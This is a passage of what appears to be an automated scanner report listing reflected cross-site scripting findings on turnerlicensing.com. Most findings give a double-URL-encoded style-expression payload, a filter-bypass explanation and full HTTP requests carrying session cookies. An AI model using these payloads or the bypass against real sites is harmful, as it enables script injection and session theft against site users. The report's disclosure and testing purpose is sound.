GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.63. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/composition_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.64. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/desk_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.65. http://www.turnerlicensing.com/espn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/espn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f4c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527718afdfa6fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0f4c'style='x:expression(alert(1))'718afdfa6fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.66. http://www.turnerlicensing.com/espn/8210571 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/espn/8210571
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e859e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252756d71373043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e859e'style='x:expression(alert(1))'56d71373043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.67. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.68. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/magnetic_to-do_notes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.69. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/memo_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.70. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/nondated_combo_packs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.71. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/paper_and_desk_caddy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.72. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/paper_cubes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.73. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/portfolios
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
The value of the bce72 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 was submitted in the bce72 parameter. This input was echoed as b393c style=x:expr/**/ession(alert(1)) c6dfa1617f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the bce72 request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b0f27be55e7=1&bce72%27style%3d%27x%3aexpression%28alert%281%29%29%27b0f27be55e7=1&bce72b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.75. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.turnerlicensing.com
Path:
/s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9411e%2520a%253dbc04429bed98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9411e a=bc04429bed98 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%2528document.cookies%2529%2529%2527b0f27be55e7=1&source=google_content_nba&bce72&9411e%2520a%253dbc04429bed98=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.76. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c93f8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271465883b49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c93f8'style='x:expression(alert(1))'1465883b49a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.77. http://www.turnerlicensing.com/s.nl/sc.34/.f [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/s.nl/sc.34/.f
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c55d7'style='x:expression(alert(1))'6061abd1262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl/sc.34/.f?ck=rnoX2q9XAatYKaJC&vid=rnoX2kNXAZKv7gpK&cktime=87993&cart=148243&chrole=17&c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.78. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Alabama
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
